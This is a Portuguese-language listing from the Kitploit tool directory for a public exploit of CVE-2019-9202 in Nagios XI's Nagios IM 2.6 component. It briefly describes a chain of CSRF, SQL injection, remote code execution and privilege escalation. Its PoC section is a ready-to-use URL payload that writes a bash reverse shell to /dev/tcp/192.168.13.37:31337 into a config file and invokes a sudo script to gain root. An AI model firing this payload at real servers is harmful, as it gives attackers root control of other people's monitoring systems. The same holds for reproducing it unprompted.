Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-9202 — Exploit de execução remota de código no Nagios IM 2.6: CSRF + SQLi + RCE + LPE --> root remoto | Kitploit
Ferramentas/GitHubGitHub/polict/cve-2019-9202
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubpolict/cve-2019-9202

CVE-2019-9202

Exploit de execução remota de código no Nagios IM 2.6: CSRF + SQLi + RCE + LPE --> root remoto

Ver Repositório
4há 7 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-9202

Exploit de execução remota de código no Nagios IM 2.6: CSRF + SQLi + RCE + LPE --> root remoto

Descrição

Ao encadear uma falsificação de solicitação entre sites (CSRF) / bypass de autorização (CVE-2019-9203) é possível explorar uma injeção SQL baseada em UNION (CVE-2019-9204), uma execução remota de código (RCE) (CVE-2019-9202) e uma escalada de privilégio local (LPE) (CVE-2019-9166), obtendo privilégios de root em um servidor Nagios XI remoto.

Requisitos

A vítima deve estar autenticada no Nagios XI, pelo que sei privilégios mínimos são suficientes.

PoC

http://nagiosxi.local/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=&incident_id='union%20select%201,2,3,4,"';echo%20%27print%28\"bash+-i+%3e%26+/dev/tcp/192.168.13.37/31337+0%3e%261+%23\"%29%3b'%3e%3e+/usr/local/nagiosxi/html/config.inc.php%3b+sudo+/usr/local/nagiosxi/scripts/repair_databases.sh%3b%23",6,7,8,'x

Baixar ferramenta